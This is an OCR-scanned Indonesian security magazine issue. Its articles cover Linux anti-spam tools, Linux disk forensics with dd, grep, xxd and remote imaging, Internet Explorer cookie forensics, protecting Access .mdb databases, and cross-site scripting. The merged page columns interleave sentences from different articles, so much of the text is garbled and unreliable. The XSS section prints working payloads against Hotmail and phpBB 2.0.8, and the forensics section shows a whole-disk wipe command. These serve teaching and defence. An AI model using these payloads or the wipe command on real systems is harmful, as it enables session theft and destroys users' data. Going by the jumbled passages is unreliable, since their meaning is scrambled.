yang berjalan di lingkungan Linux. Teknik dalam agents yang termasuk didalamnya razor-admin, razor-
menanggulangi spam tidak berbeda jauh dengan check, razor-report, dan razor-revoke.
Windows, yang menjadi perbedaan adalah lingkungan 2. razor-whitelist; sebuah file yang berisi sebuah list atau
tempat program berjalan karena program yang berjalan di daftar alamat-alamat email, domain-domain, dan Body
lingkungan Windows tidak dapat dijalankan di lingkung- Content yang akan ditandai sebagai WhiteList (daftar
an Linux. putih). Email-email tang terdaftar dalam file ini tidak
Oleh karena itu untuk melengkapi pembahasan mengenai dilaporkan dan akan secara otomatis diklasifikasikan
Anti-Spam Toolkits maka disini akan dipaparkan juga sebagai non-spam oleh razor-check.
program-program yang berjalan di lingkungan Linux
yang dapat digunakan untuk menanggulangi spam. Download Razor
Hampir seluruh Anti-Spam Toolkits untuk Linux mem- Razor dapat ddownload dari http://razor.sourceforge.net
butuhkan Procmail. Procmail merupakan mail processor dan didistribusikan dalam dua file, yaitu:
yang jalan sebelum sebuah email dari sebuah mail-server 1. razor-agents-2.xx.tar.gz berisi source code untuk
mengirimkannya kepada seorang pengguna mailbox. razor-agents. xx menandakan nomor versi.
Umumnya, Linux sudah terdistribusi dengan Procmail contoh: razor-agents-2.36.tar.gz
termasuk didalamnya. Jika Linux anda belum memiliki 2. razor-agents-sdk-2.xx.tar.gz berisi sebuah nomor
Procmail, cek ke http://www.procmail.org modul-modul PERL yang dibutuhkan Razor.
Razor memerlukan Perl 5 agar dapat jalankan termasuk
VIPUL’S RAZOR modul-modul Perl seperti:
Vipul’s Razor (selanjutnya akan disebut Razor) berdiri di 1. Net::Ping
server, merupakan gabungan antara software dan sebuah
kolaborasi yang didistribusikan dalam anti-spam network. 2. Net::DNS
Razor didistribusikan gratis, bersifat open source, dan 3. Time::HiRes
didistribusikan dibawah Artistic License. 4. Digest::SHA1
Sistem kerja Razor tidak jauh berbeda dengan SpamNet 5. Getopt::Long
(lihat: Anti-Spam Toolkits for Windows) karena Razor 6. File::Copy
dibuat oleh Vipul Ved Prakesh yang merupakan asisten 7. Digest::Nilsimsa
penemu Cloudmark. 8. URI::Escape
Dengan bermodalkan kekuatan open source menjadikan Instalasi Razor
banyak orang dapat memberikan kontribusi dalam
pengembangan Anti-Spam Toolkit ini, termasuk Berikut langlah-lamgkah dalam menginstalasi Razor:
didalamnya Chad Norwood dan Theo Van Dinter 1. Download dan un-tar razor-agents-sdk-2.xx.tar.gz
(pengembang SpamAssassin). tar -xvf razor-agents-sdk-2.xx.tar.gz
Informasi lebih lanjut mengenai Razor dapat ditemukan
di http://razor.sourceforge.net 2. Ikuti perintah di bawah untuk instalasi modul-modul Perl
Razor dibuat dalam beberapa komponen yang dikenal se- perl Makefile.PL
bagai razor-agents (lihat textbox di bawah). make
Pada pendistribusiannya, Razor dibuat sebagai pasangan make test
file konfigurasi, yaitu:
make install
Razor Agents
3. Download dan un-tar razor-agents-2.xx.tar.gz
razor-admin Yang mendaftarkan anda ke Razor Network
razor-check Agen Filter: yang melakukan pengecekan mail tar -xvf razor-agents-2.xx.tar.gz
dalam network
razor-report Agen Report: yang mengizinkan anda 4. Ikuti perintah di bawah untuk intalasi Razor agents
melaporkan sebuah email sebagai spam ke
perl Makefile.PL
Razor Neotwork
razor-revoke bagian dari Agen Report: kebalikan dari razor- make
report dimana mengizinkan anda melaporkan
make test
sebuah email bukan sebagai spam ke Razor
Network make install
creating symlink razor-client <== /usr/bin/razor-admin dcc-dccm.tar.Z Termasuk Send Mail Filter interface
(dccm) dan client program (dccproc dan
dccifd).
Ubah dari root ke seorang user dengan anda sebagai pene-
rima mail, kemudian ikuti perintah berikut di bawah:
$ razor-admin -create
Instalasi DCC
Instalasi DCC lebih mudah ketimbang Razor, caranya:
Hal tersebut membangun sebuah default dari direktori 1. Download dan un-tar dcc-dccproc.tar.gz
konfigurasi sebagai ~/.razor (tanda tilde ~ adalah path
untuk direktori home anda). Dan juga membuat beberapa tar -zxvf dcc-dccproc.tar.gz
file konfigurasi seperti:
Hal tersebut juga akan membuat sebuah direktori yang
1. razor-agent.conf disebut ./dcc-dccproc-x.xx (x menunjukkan major dan
2. server.catalogue.lst minor nomor versi).
3. server.nomination.lst 2. Masuk ke direktori yang terbentuk tersebut kemudian
4. server.folly.cloudmark.com.conf lakukan beberapa perintah di bawah ini
5. servers.dicovery.lst ./configure
make
DCC (DISTRIBUTED CHECKSUM CLEARINGHOUSE) make install
Seperti juga Razor, DCC didistribusikan sebagai anti-spam
networks, gratis, dan opensource. Menjalankan DCC
DCC merupakan proyek Rhyolite Software dan dapat Untuk menjalankan dccproc client, anda harus memasti-
ditemukan di http://www.rhyolite.com/anti-spam/dcc kan Procmail telah terinstalasi, kemudian buat sebuah
Email yang ditandai oleh pengguna sebagai sebuah spam Procmail recipe yang berisi beberapa hal seperti berikut di
akan diterima oleh sebuah checksum yang melaporkan hal bawah ini
tersebut ke DCC network. Mail-server atau client akan :0 f
melakukan pengecekan mendalam ke DCC network dengan
| /usr/local/bin/dccproc -ERw -ccmn,5
menggunakan DCC tool yang kemudian dibandingkan
dengan checksum message di database. :0 e
x.xx.xx.tar.gz dimana x berarti nomor versi. jut mengenai QSF dapat ditemukan di
Contoh: bogofilter-0.15.11.tar.gz http://www.ivarch.com/programs/qsf.shmtl
COMPUTER FORENSICS
Forensic Tools pada Linux
Kali ini Firrar Utdirartatmo (firrar@lycos.com) membahas berbagai tool
yang terdapat pada Linux dari sudut pandang computer forensics.
Dalam prakteknya para cyber cops memang harus fasih menggunakan berbagai distro Linux.
S
AYA TERTARIK MEMBUAT ARTIKEL INI SETELAH MELIHAT kedalam disk tersebut. Ini bertujuan untuk menjamin agar
Neotek Vol IV No 6 mengenai computer forensics, data apapun yang ada pada disk tersebut benar-benar ber-
yang membahas tool-tool di Windows semacam asal dari image, dan bukan berasal dari data ‘sisa’ sebelum-
Norton Ghost. Sebenarnya artikel ini bukanlah panduan nya, yaitu data yang ditinggalkan dari proses apapun sebe-
profesional mengenai forensik, tetapi sekedar pengenalan lum restore image ke disk.
sederhana saja yang memanfaatkan tool-tool yang sudah Kita bisa mempergunakan suatu special device yang dipakai
ada pada kebanyakan distro Linux. Semoga pembaca dapat sebagai source of zeros. Ini dipakai untuk membuat suatu
memanfaatkan tool-tool tersebut yang selama ini mungkin file kosong dan wipe bagian-bagian dari disk. Kita bisa me-
jarang kita kenali kegunaannya, meski tidak dibatasi hanya nulis nol ke seluruh disk dengan mempergunakan perintah:
untuk keperluan forensik saja.
dd if=/dev/zero of=/dev/hda bs=4096
Linux sudah memiliki sejumlah utiliti sederhana yang mem-
buat proses imaging dan analisis dasar dari suatu disk dan Atau pada floppy disk dengan:
drive secara mudah. Di antaranya: dd if=/dev/zero of=/dev/fd0 bs=512
? dd atau cp: perintah yang dipergunakan untuk menyalin dd: writing `/dev/fd0': No space left on device
dari suatu file atau perangkat input ke perangkat output 2881+0 records in
atau file, di sini yang terjadi sebenarnya hanyalah imaging 2880+0 records out
bitstream sederhana Ini akan melakukan penulisan nol ke setiap sektor dalam
? cfdisk dan fdisk: untuk menentukan struktur disk 4096 atau 512 byte. Penentuan ukuran blok yang besar
bisa mempercepat proses penulisan. Suatu percobaan de-
? grep: mencari file-file untuk kemunculan suatu ekspresi ngan ukuran blok yang berbeda: misalnya 60 GB disk bisa
atau pola dilakukan dalam 1 jam dengan controller IDE. Sejumlah
? chmod: mengubah permission pada suatu file, untuk parameter drive tertentu bisa ditentukan dengan perintah
mematikan write permission pada suatu file image hdparm, misal setting dma pada suatu drive bisa mening-
? Loop device: memungkinkan melakukan mount suatu katkan kecepatan.
image tanpa perlu melakukan penulisan image ke disk 2. Membuat Image dari Suatu Disk
? sha1sum: membuat dan menyimpan suatu hash SHA Membuat image merupakan salah satu tahapan dalam kom-
dari suatu file atau daftar file (termasuk perangkatnya) puter forensik. Di sini kita akan coba membuat image untuk
? file: membaca informasi header file dalam suatu usaha suatu floppy disk:
untuk memastikan tipenya, tidak tergantung dari nama dd if=/dev/fd0 of=simpan.img bs=512
atau ekstensionnya 2880+0 records in
? xxd: tool hexdump command line untuk melihat file 2880+0 records out
dalam mode heksadesimal, atau bisa juga memanfaat- Perintah tersebut akan menyalin piranti floppy (/dev/fd0) se-
kan bila ada ghex dan khexedit, yaitu editor heksadesi- bagai input file (if) dan menulis output file(of) ke simpan.img.
mal Gnome dan KDE (GUI) yang mempunyai kemam- Lihat ukuran file yang dihasilkan tersebut 1474560. Option
puan pencarian dan pemilihan byte. bs menentukan ukuran blok, meski ini tidak selalu diperlu-
Berikut akan kita lihat sejumlah langkah sederhana yang kan untuk kebanyakan block device, karena ukuran blok
memungkinkan melakukan analisis praktis yang mudah sebenarnya ditangani oleh kernel Linux. Lalu bila anda ingin
memakai tool-tool Linux di atas. Selanjutnya bila merasa membuat image itu terjaga dari kemungkinan pengubahan,
belum jelas dengan tutorial ini bisa memakai perintah man ubahlah read-write permission dengan:
di Linux untuk melihat penggunaan tool-tool tersebut. chmod 444 simpan.img
Untuk sederhananya kita akan mempergunakan sebuah (444 akan memberikan semua user akses read-only)
floppy disk dengan format file DOS memuat sejumlah file,
di antaranya terdapat file yang hidden, file yang sudah Untuk melakukan restore image tersebut ke disk lainnya bagi
dihapus, juga subdirektori. Untuk hard disk kita hanya keperluan analisis, siapkan floppy disk kosong, dan
akan mengamati saja strukturnya. pergunakan:
dd if=simpan.img of=/dev/fd0 bs=512
Melakukan Imaging, Mounting, dan Split
Kalau anda lihat perintah ini semacam kebalikan dari
1. Menyiapkan Disk untuk Imaging perintah dd sebelumnya. Nah, floppy disk tersebut
Salah satu proses dalam forensik disk adalah melakukan sekarang siap dipergunakan sebagai working copy untuk
wipe suatu disk sebelum melakukan restore image forensik keperluan analisis.
1978.jpg: JPEG image data, JFIF standard dari disk, sebagaimana halnya slack space. Di sini kita coba
Aircraft.jpg: JPEG image data, JFIF standard mencari teks dari suatu file yang terhapus (unallocated space).
baru: directory
Bersyukur.doc: Microsoft Office Document Pertama, kita akan mempergunakan perintah grep untuk
biayahidup.txt: ASCII text mencari kemunculan suatu ekspresi atau pola pada image.
Garuda.gif: GIF image data, version 89a, 606 x 209, Kita akan mempergunakan sejumlah option yang bisa
hasilsurvei.txt: data membuat keluaran dari grep menjadi lebih berguna.
Kesejatian.doc: Microsoft Office Document Sintaks dari grep adalah:
Naik_KA.exe: MS-DOS executable (EXE), OS/2 or MS Windows grep -options pattern range_pencarian
prospekmobilinternet.rtf: Rich Text Format data, version 1, ANSI
vi.jpg: JPEG image data, JFIF standard Hal pertama yang akan kita lakukan adalah membuat
daftar keyword untuk pencarian. Bukalah suatu teks editor
Jika ada sejumlah besar file tanpa ekstension, atau dimana dan buatlah daftar term yang ingin kita cari. Misalkan kita
ekstensionnya telah berubah, perintah file akan menemu- akan mempergunakan kata ‘game’, ‘karyawan’, dan
kannya. Misal kita coba salin file vi.jpg menjadi vi.j, lalu ‘mahasiswa’. Buatlah file daftarkata.txt berisi:
diperiksa dengan file: game
file vi.j karyawan
vi.j: JPEG image data, JFIF standard mahasiswa
Misalkan kita mencari image kita bisa mempergunakan Pastikan pada daftar itu tidak memuat baris kosong di da-
grep untuk menentukannya, buat dulu daftar type-nya: lam maupun di akhir file. Sekarang kita jalankan perintah
file * > /root/daftartype grep pada image:
Lalu pergunakan grep: grep -aibf daftarkata.txt simpan.img > hits.txt
cat /root/daftartype | grep image grep menggunakan file daftarkata.txt sebagai pola untuk
pencarian. Ini ditentukan dengan option -f . grep akan
1978.jpg: JPEG image data, JFIF standard mencari pada simpan.img untuk keberadaan pola tersebut,
Aircraft.jpg: JPEG image data, JFIF standard dan keluarannya akan dilakukan redirect ke file bernama
Garuda.gif: GIF image data, version 89a, 606 x 209 hits.txt, sehingga kita bisa mengamati keluarannya.
vi.jpg: JPEG image data, JFIF standard Option -a memberitahukan grep untuk mencetak semua
baris dimana terjadi kemunculan, bukan hanya nama file di
Perintah ini akan melakukan stream isi dari file daftartype mana mereka berada.
memakai cat dan melakukan pipe keluarannya dengan grep,
untuk mencari kemunculan string ‘image’. Option -i membuat grep mengabaikan perbedaan case
(huruf besar/kecil).
Catatan: file beratribut hidden tetap dapat muncul di sini.
Option -b membuat grep menampilkan byte offset dari
4. Melihat Isi File tiap kemunculan, sehingga kita bisa menemukan baris
tersebut memanfaatkan editor heksadesimal semacam xxd
Untuk file teks dan file data, kita bisa mempergunakan cat, atau Ghex.
more atau less untuk melihat isinya. Ingat, jika keluaran
bukanlah teks standar, kita mungkin akan ‘mengacaukan’ Kita bisa memanfaatkan cat, less, more atau strings untuk
terminal (ketikkan reset untuk membereskannya). melihat isi file hits.txt. Pada setiap awal baris ditampilkan
angka yang menunjukkan byte offset untuk baris tersebut
Lebih baik melakukannya dari jendela terminal pada pada file image.
Xwindow sehingga kita bisa menutupnya dengan mudah,
lalu membuka jendela terminal lainnya yang baru. cat hits.txt
Mempergunakan perintah file akan memberikan gambaran Gambar 1.
file mana yang akan dilihat. Mungkin, alternatif yang bagus Contoh isi file
untuk melihat file adalah mempergunakan perintah strings. hits.txt
Perintah ini bisa dipergunakan untuk melakukan parse teks
biasa pada file. Ini cocok untuk dokumen terformat (MS
Word atau OpenOffice), file data (Excel), bahkan binary
(misal executable yang tak diketahui) yang mempunyai
string teks yang diinginkan di dalamnya. Lebih baik lagi
melakukan pipe keluarannya dengan less:
strings nama_file| less
Cobalah melakukannya pada file DOC, JPG, bahkan EXE,
hasilnya mungkin akan menarik untuk diamati. Sekarang bukalah editor heksadesimal dan masukkan byte
offset yang ada pada hits.txt, ekivalensi ASCII-nya akan
Catatan: selesai melakukan eksplorasi, pastikan melakukan nampak di sebelah kanan. Anda akan menemukan hasil
unmount floppy atau image. Anda harus keluar dulu dari yang menarik.
mountpoint atau akan ada pesan ‘busy error’, lakukan:
Sintaksnya:
umount /mnt/analisis
xxd -s offset simpan.img | less
4. Mencari Teks pada Unallocated & Slack Space Misal dari contoh pada gambar, kita masukkan:
Sekarang kita akan menganalisa image yang merupakan copy xxd -s 414608 simpan.img | less
byte demi byte dan termasuk di dalamnya unallocated area
Gambar 2.
Contoh tampilan
xxd
T
ERDAPAT BANYAK JENIS INVESTIGASI YANG DILAKUKAN
Mengambil Image Secara Remote dengan RDA
pada computer forensic. Salah satu sumber poten-
Mungkin anda pernah berpikir, "Bagaimana caranya mengambil image sial untuk memberikan informasi yang akan mem-
dari hard disk tanpa membongkar PC?" Nah, ketimbang membuka PC bantu pembuktian adanya suatu kejadian adalah melaku-
dan memasang hard disk lain ke komputer yang ingin kita ambil
image-nya, kita bisa memanfaatkan RDA untuk mengirim image lewat kan pemeriksaan dari aktivitas ber-Internet, semacam situs
jaringan ke komputer lain. Remote Data Acquisition Utility (RDA) web mana yang dikunjungi.
merupakan tool kecil untuk mengambil image hard disk dan mentrans-
fernya lewat jaringan dilengkapi dengan checksum MD5 dan/atau Kebanyakan user familiar dengan pemakaian browser Micro-
CRC32. soft Internet Explorer yang populer di Windows. Kita akan
Sederhananya di sini ada dua program yaitu RDA client dan RDA coba melakukan analisis forensik sederhana yang berkaitan
server. Di mana client akan booting dari floppy, lalu mengirim data dengan aktivitas ber-Internet, yaitu ditujukan pada file-file
image ke server yang berjalan pada komputer lainnya. Tool ini bisa cookies dan file index.dat yang dihasilkan oleh browser
diambil dari http://md5sa.com/downloads/rda/rda-0.2.1c.tgz
Microsoft Internet Explorer.
Pertama-tama kita buat dulu dua buah boot disk dengan memanfaatkan
dd, rawwrite, atau kalau di Windows adalah rawwrite for Windows. Salah satu prinsip dari computer forensic adalah semua me-
Image yang akan kita tulis ke floppy adalah bootfloppy.bin dan todologi analisis harus dapat terdokumentasi dengan baik,
rootfloppy.bin yang dapat diperoleh dari situs tersebut. dan repeatable, serta memiliki batas error yang masih dapat
Kemudian lakukan instalasi RDA server: diterima. Banyak dari file-file penting dalam Microsoft
tar -zxvf rda-0.2.1c.tgz Windows memiliki struktur yang tidak terdokumentasi
masuk ke direktori yang dihasilkan: dengan baik (undocumented). Pada saat ini masih sedikit
make tool open source yang dapat digunakan untuk melakukan
make install pengujian pada data file-file Microsoft.
Jalankan RDA server (tentukan sendiri letak anda ingin menyimpan
image): Tool-tool berikut bisa diperoleh pada www.foundstone.com.
rda --recv -o /root/hasil.img
Sejumlah penyelidikan forensik memerlukan rekonstruksi
dari file cookies Internet Explorer.
Lalu pada komputer yang ingin diambil image, lakukan booting
dengan kedua disk tersebut, mulai dari bootfloppy lalu rootfloppy. Galleta merupakan tool sederhana untuk analisis cookies
Tentukan alamat IP client tersebut. Kemudian jalankan RDA (arahkan Internet Explorer, sedang Pasco menganalisis file index.dat.
ke IP server):
Keduanya merupakan tool command line yang dipanggil
rda --send -r 192.168.0.1 -i /dev/hda7
dari prompt DOS.
Pada contoh di atas, image dibuat untuk partisi /dev/hda7 diarahkan
ke RDA server yang bertempat di 192.168.0.1. Contoh tampilan hasil Memeriksa File Cookies dengan Galleta
di server:
Server mode. 1. Format File Cookie IE
Start: Sat Aug 7 08:24:47 2004
65690696 bytes in. Karena HTTP merupakan stateless protocol, maka situs web
End: Sat Aug 7 08:27:23 2004 harus menempatkan informasi pada komputer user jika per-
65769472 bytes read
65769472 bytes wrote
lu menyimpan informasi mengenai suatu web session.
65769472 bytes reported by client. Misal, saat user memilih sesuatu barang dan menambahkan-
156 seconds - 411.00 Kbytes / sec nya ke shopping cart, informasi tersebut bisa disimpan pada
[root@warcraft root]# ls -l hasil.img
-rw-r--r-- 1 root root 65769472 Aug 7 08:27 hasil.img komputer client ketimbang pada web server. Fasilitas untuk
Tool ini juga mampu melakukan skip error pembacaan, semacam bad menyimpan informasi dengan cara seperti ini dikenal seba-
block, dan mengganti dengan 0, serta mencatat posisinya. Output gai cookie. Cookie adalah suatu ‘file kecil’ yang memuat data
hasil image bisa juga ditulis ke suatu disk /partisi (untuk keperluan yang ditempatkan web server pada komputer user, yang
penggandaan disk), dan dapat dipotong (span) ke sejumlah file. nantinya bisa diambil kembali oleh server.
Untuk mengetahui option yang ada bisa anda baca manual RDA
dengan man rda atau rda -h. Selama analisis forensic informasi dalam file cookie IE di-
Misal untuk melakukan copy hard disk jarak jauh (hard disk harus ubah ke dalam bentuk yang lebih mudah dibaca oleh manu-
identik jenis dan ukurannya), maka pada sisi server dilakukan: sia. Analisis Cookies memberikan gambaran mengenai
rda --recv -o /dev/hdc aktivitas internet yang dicurigai.
Penulisan akan dilakukan mulai dari sector 0 (MBR), ini akan jadi
semacam remote disk duplication.
File cookies biasanya terletak pada:
? Untuk Windows 2000/XP:
C:\Documents and Settings\<username>\Cookies
? Untuk Windows 95/98/ME:
C:\Windows\Cookies
COMPUTER FORENSICS
Analisa Forensik Pemakaian IE
Perilaku browsing anda dapat diintip meskipun anda sudah berusaha menghapus file History
dari Internet Explorer anda. Ini dikarenakan adanya pemeriksa cookie yang dinamakan Galleta dan
pemeriksa index.dat yang dinamakan Pasco. Masih ada lagi software serupa yang khusus untuk
admin jaringan atau penegak hukum: IE History Viewer.
Perhatikan, file tersebut berada dalam format ASCII, sehing-
ga orang bisa membaca isinya dengan mudah. Kita akan lihat
setiap barisnya:
1: memuat nama variabel, pada contoh ini variabel
bernama B
2: memuat nilai variabel tersebut, pada contoh ini
variabel B memiliki nilai cvps1et0cgut6&b=2
3: situs web yang mengeluarkan cookie, pada contoh ini
adalah yahoo.com
4: flag, pada contoh ini adalah nol.
Gambar 1. Letak cookies pada Windows 98 5 - 6 : expired time untuk cookie, yaitu masa kadaluwarsa
sehingga cookies tidak valid lagi. Waktu tersebut
dipisahkan dalam 2 integer: most significant integer
lalu least significant integer.
7 - 8: creation time, waktu pembuatan cookie
9: selalu memuat * sebagai delimiter bila file teks
tersebut memuat lebih dari satu cookie. Ingat dalam
satu file cookies bisa terdapat lebih dari satu variabel
cookies.
Bisa diringkaskan dalam tabel berikut:
Baris Keterangan
1 Nama variabel
2 Nilai variabel
3 Situs web asal cookies
4 Optional flag
5 most significant integer untuk expired time
6 least significant integer untuk expired time
7 most significant integer untuk creation time
8 least significant integer untuk creation time
9 Cookie Record Delimiter (karakter *)
Gambar 2. Letak cookies pada Windows 2000 Kalau anda lihat memang format waktu yang nampak cukup
susah dibaca, karena berada dalam format FILETIME
Windows. Tetapi dengan tool galleta, format tersebut akan
Setelah mengunjungi suatu situs web seperti misalnya situs dikonversi menjadi bentuk yang lebih mudah kita baca.
www.yahoo.com suatu cookie akan dibangkitkan pada kom-
puter user yang isinya semacam contoh berikut (dari file 2. Menggunakan Galleta
cookies maulana@yahoo[2].txt):
Galleta, dari bahasa Spanyol yang bermakna ‘cookie’, dikem-
B bangkan untuk melakukan pemeriksan isi dari file cookie.
cvps1et0cgut6&b=2
yahoo.com/ Galleta akan melakukan parsing informasi dalam suatu file
0 cookie dan menampilkan hasilnya dalam bentuk field-field
985407488 yang bisa di-import ke program spreadsheet semacam Excel.
30072022 Galleta tersedia pada sejumlah platform Windows (dengan
2156856480 Cygwin), Mac OS X, Linux, dan BSD.
29642495 Sintaksnya:
*
galleta [options] <nama_file_cookies>
Pada contoh ini kita hanya mengambil sampai dengan baris
kesembilan. Cookie ini mengandung informasi yang disim- dengan options adalah (bisa dibiarkan kosong)
pan oleh client dari web server, nama domain yang bertang- -t Field Delimiter (default delimiternya adalah TAB, bila
gungjawab pada cookies ini, dan time/date stamp. tidak ditentukan user)
Gambar 10. Daftar situs web yang dikunjungi dari file .DAT
DATABASE SECURITY
Mencegah MDB Download
Firrar Utdirartatmo (firrar@lycos.com) memberikan jawaban mengenai cara mengamankan
database Microsoft Access dari usaha carder men-download-nya dari situs e-commerce
yang umumnya dilanjutkan dengan usaha meng-crack password dan
mendapatkan informasi dari dalamnya.
P
ADA NEOTEK EDISI WEB HACKING VOL. IV - NO. 05, lain; termasuk dapat diambil dari folder Temporary In-
telah dibahas tentang Comersus Shopping Cart Bug. ternet Files bila mempergunakan Internet Explorer versi 5
Bug tersebut muncul, karena carder dapat men- ke atas).
download file MS Access (memiliki ekstensi *.MDB) yang Nah, untuk menghindarinya
dipergunakan sebagai database. Pada artikel ini, penulis akan masih ada satu langkah lagi
memberikan sebuah tips sederhana untuk mencegah di- yang diperlukan. Buatlah su-
download-nya file MS Access tersebut. atu table yang tidak berkait-
Letak dan Nama File Non-Standard an dengan table-table lain-
nya (katakanlah table dummy).
Sebenarnya ada cara mudah untuk mencegah di-down-
load-nya file MS Access, yaitu dengan menyimpan file Pada table dummy tersebut,
MS Access tersebut di luar virtual directory yang diguna- buatlah sebuah field yang
kan untuk web publish, serta di luar turunan dari virtual memiliki data type Text. Per-
directory tersebut. hatikan, bahwa untuk Uni-
code Compression pilihlah
Namun, cara tersebut mungkin hanya berlaku bila kita me- Yes (pilihan ini menyebab-
masang web server sendiri (dan kalau memasang web server kan untuk sebuah karakter
sendiri, mungkin kita akan menggunakan MS SQL Server hanya diperlukan 1 byte).
bukan MS Access sebagai database-nya). Sedangkan free
web hosting serta web hosting dengan biaya murah yang Gambar 2. Datatype Text pada
Isilah field pada table
menyediakan MS Access sebagai database-nya, biasanya field dummy pada table dummy, dummy tersebut dengan
meletakkan file MS Access tersebut pada virtual directory %> %><% %><% <%.
atau turunannya. Untuk keperluan ini, maka ekstensi
Sebenarnya, agak sukar bagi carder untuk menebak nama file MS Access HARUS dikemba-
file MS Access yang dipergunakan. likan ke asalnya (*.MDB) dan sete-
lah selesai bisa diubah lagi ke eks-
Tapi, bagaimana bila aplikasi yang dipergunakan oleh situs tensi ganda (*.MDB.ASP). Hal ini
e-Commerce tersebut merupakan aplikasi open-source? Wah, disebabkan, MS Access tidak dapat
ini tentunya dapat menjadi malapetaka. mengakses file MS Access yang
Salah-satu cara yang dapat ditempuh adalah dengan segera memiliki ekstensi di luar *.MDB
Gambar 3. Mengisi dum-
mengganti nama file MS Access tersebut. my record
(sedikit aneh?).
Bila Anda ingin membuat aplikasi ASP yang open-source Memciptakan Pesan Kesalahan
dengan menggunakan file MS Access sebagai database-nya
serta tidak ingin file MS Access tersebut dapat di-download Mungkin anda bertanya, apa maksud dari isi %> %><%
oleh pihak-pihak yang tidak berkepentingan, maka Anda %><% <% ini.
dapat menggunakan tip berikut. Seperti kita ketahui, script ASP selalu memiliki delimiter,
yang untuk pembuka adalah <% dan untuk penutup adalah
Trick dengan Dummy Table %>. Bila delimiter pembuka tidak diakhiri dengan delimiter
Pertama-tama, kita tambah- penutup (begitu pula sebaliknya), maka akan di-generate su-
kan ekstensi *.ASP di bela- atu pesan kesalahan (error message) oleh web server.
kangnya, sehingga dengan
demikian file MS Access
tersebut kini memiliki eks-
tensi ganda *.MDB.ASP .
Tapi, langkah pertama ma-
sih kurang, karena orang
masih dapat men-down-
load-nya dengan aplikasi-
aplikasi untuk keperluan
download (FlashGet, Down-
load Accelerator, dan lain-
Gambar 5. Pada folder testdb, letakkan file-file data.mdb.asp, Gambar 8. Testform1.html untuk ODBC tanpa DSN
testform.html, dan myresponse.asp
DATABASE SECURITY P
ADA EDISI SEBELUMNYA SUDAH DIBAHAS
kelemahan beberapa shopping cart
(NeoTek Vol. III No. 05, Feb/Mar
2003 dan NeoTek Vol. IV No. 05, 2004).
SHOPPING CART
Untuk semakin melengkapinya, kali ini
penulis mengangkat kelemahan shopping
cart pada VP-ASP.
Alasan mengangkat topik ini adalah kaitan
eratnya dengan database security, yang
dalam hal ini VP-ASP shopping cart me-
miliki database yang dikemas dalam ben-
Melengkapi artikel tentang cara mencegah MDB Download, tuk file MDB.
MA Rody Candera (odyxb@bogor.net) melengkapi dengan Rincian yang dibahas dalam majalah ini
bahasan mengenai kelemahan VP-ASP Shopping Cart bertujuan untuk menambah pengetahuan
para pembaca mengenai e-commerce
dalam melindungi databasenya yang dikemas dalam bentuk security dan bukan untuk melakukan
file MDB (Microsoft Database). tindakan yang melanggar hukum.
WEB SECURITY
Memahami (Penyalahgunaan) XSS
Cross Site Scripting yang lebih dikenal sebagai XSS menjadi semakin terkenal dengan adanya
kasus ‘Hacker KPU’ yang memanfaatkan XSS yang dikombinasikan dengan SQL Injection.
MA Rody Candera (odyxb@bogor.net) membahas apa sebenarnya yang ingin dicapai
oleh XSS dan bagaimana akhirnya dapat disalahgunakan.
XSS: URL Retrieval
X
SS MERUPAKAN SINGKATAN DARI CROSS SITE SCRIPTING.
Berhubungan dengan aplikasi keamanan web, XSS URL Retrieval yang paling dekat kita kenal yaitu pada apli-
adalah satu metode serangan yang justru tidak kasi webmail seperti Yahoo! maupun Hotmail. Pada saat kita
menghasilkan sebuah akses sistem atau root dari suatu web akan mengakses account email yang mengharuskan log-in
server walaupun serangan dilakukan secara langsung. Inti- terlebih dulu dan ketika log-in dinyatakan sukses, kita men-
nya, serangan ini adalah sebuah tindakan yang dilakukan dapatkan session ID, yang dapat dilihat pada address box.
untuk mendapatkan informasi yang berkaitan erat dengan
aplikasi web. Contoh ID Session pada saat log-on:
Untuk memahami XSS, dibutuhkan penguasaan HTML aktif http://www.domain.com/home.cgi?id=665Y3eF7Tq
seperti JavaScript, Visual Basic Script, dan termasuk didalam- Pada awalnya kebanyakan Session ID yang ditentukan oleh
nya penguasaan akan HTML itu sendiri sebagai bagian webmail tidak bersifat random, sehingga pada sesi lainnya
utama dalam XSS. masih tetap menggunakan Session ID yang sama.
Jadi XSS merupakan kemampuan dalam melakukan injeksi http://www.domain.com/inbox.cgi?id=665Y3eF7Tq
dengan menggunakan HTML tag yang dikombinasikan
dengan JavaScript maupun VBScript yang kemudian dima- Hal tersebut dimanfaatkan oleh pihak yang tidak bertanggung
sukkan kedalam sebuah aplikasi web. Ada banyak bentuk jawab untuk mencoba masuk pada dengan Session ID tersebut.
aplikasi web, antara lainnya yaitu webmail, online forum, Sekarang ini, baik Yahoo! maupun Hotmail menggunakan
dan e-shopping. session ID yang bersifat random.
XSS hadir disaat adanya tuntutan untuk menciptakan web Sebagai contoh dasar penggunaan XSS
yang dinamis atau membuat web yang indah dipandang lihat <script>alert("Hello");</script>
mata dengan fitur-fitur yang dianggap dapat memberikan yang jika kita menerima email yng berisi
daya tarik tersendiri, tetapi luput dari pengamatan akan script tersebut maka script tersebut akan
masalah keamanannya. diinterpretasikan oleh browser (jika web-
Sebagai contoh yang dapat dipetik yaitu menyediakan fitur mail vulnerable terhadap cross site script- Gambar 2. Hello
guestbook pada web. Kurangnya memperhatikan validasi ing) dan akan muncul message box pada
atas illegal input yang layar.
mungkin saja bisa dila-
kukan oleh seseorang
dengan menyisipkan mali-
cious code dapat menjadi
sebuah ancaman.
Sekali saja penggunaan
JavaScript, maka pengun-
jung web yang lainnya
yang mengakses situs
tersebut dapat menjadi
korban karena telah meng-
eksekusi script yang disi-
sipkan di guestbook ter-
sebut tanpa disadari. Ba-
haya yang terjadi bisa saja
data yang terdapat dalam
hardisk korban dihapus
karena JavaScript mampu
melakukan hal itu.
XSS Development: Hotmail Vulnerability phpBB versi 2.0.8 yang diinformasikan pada tanggal 22
Metode XSS makin hari terus berkembang, ini dapat di- Juli 2004 dimana vulnerabilities tersebut ditemukan oleh
Janek Vind.
lihat dari informasi yang memberitakan mengenai vul-
nerable terhadap sistem aplikasi web dan info yang ter- Catatan: NeoTek Vol. III - No. 06, Mar/Apr 2003, Dani
baru yaitu pada webmail Hotmail vulnerable terhadap Firmansyah pernah membahas mengenai teknik menjebol
XSS (Jul 22 2004). phpBB 2.0.0
Berikut dibawah merupakan bentuk exploit XSS yang
URL Retrieval:
ditemukan pada phpBB 2.0.8
<!--><img
src="javascript:window.location='http://www.google.co
Cookies:
m'"><!--> http://www.target.com/phpbb208/index.php?category_row
s[0][cat_id]=1&category_rows[0][cat_title]=waraxe<scr
script tersebut akan membuat auto redirect ke situs
